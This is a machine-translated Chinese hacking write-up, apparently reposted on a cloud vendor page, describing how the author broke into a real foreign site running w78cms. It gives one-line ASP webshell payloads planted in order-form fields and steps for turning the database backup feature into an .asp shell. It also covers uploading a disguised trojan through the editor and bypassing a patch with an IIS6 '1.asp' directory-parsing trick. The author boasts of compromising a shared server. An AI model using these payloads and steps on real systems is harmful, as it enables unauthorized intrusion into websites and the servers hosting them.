A foreign site uses the w78cms program. It seems that this program is quite rare. It seems that it has been done for people. Baidu's previous experiences are like this:
Method 1:
Prerequisites: the recipient has not modified the default database address.
Step 1: Enter a Trojan on the order page, such as the product name and order quantity.
Www.2cto.com <% eval request ("ha") %>
Step 2: Back up the database. The database name is asp file (Note: during the first backup, the program will automatically add. MDB suffix, which needs to be backed up twice) Note: The pop-up box asking you to log on will pop up. Don't worry, run the backup again.
Step 3: connect to a Trojan and upload the shell
Method 2:
Prerequisites: The owner has not modified the default EWEB path.
Step 1: directly upload a Trojan with the image Suffix in the EWEB.
Step 2: Back up the database. The database name is asp file (Note: during the first backup, the program will automatically add. MDB suffix, which needs to be backed up twice) Note: The pop-up box asking you to log on will pop up. Don't worry, run the backup again.
Step 3: Back up your shell
Then, we found that the website was replaced by a new version of the program, which has already limited the suffix of the back-end backup database. This is awesome, and the backup will certainly not work. Then, the uploaded component is deleted. Why. I captured the packet during the backup and found that a hidden parameter was submitted. The backup directory should be able to use the iis6 Parsing Vulnerability.
In addition to serial numbers, add one sentence to the link:
<% Eval request ("chopper") %>
In the backup area, intercept the data submitted by the backup, add a subdirectory named "1. asp", and submit the file. After the backup is successful, you can get a sentence and link it.
Finally, I spoke about this foreign junk server. It's really a good anti-penetration solution. I don't even know it when I got stuck with my dad. I don't know how many hundred websites have been hung up. The Administrator is really rubbish, I was able to browse it all over and kneel down.
Finally, I sent an oil-hitting poem from a foreigner.
If you hack, don't speak
If you speak, don't write
If you write, don't sign
If you sign, don't be surprised
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
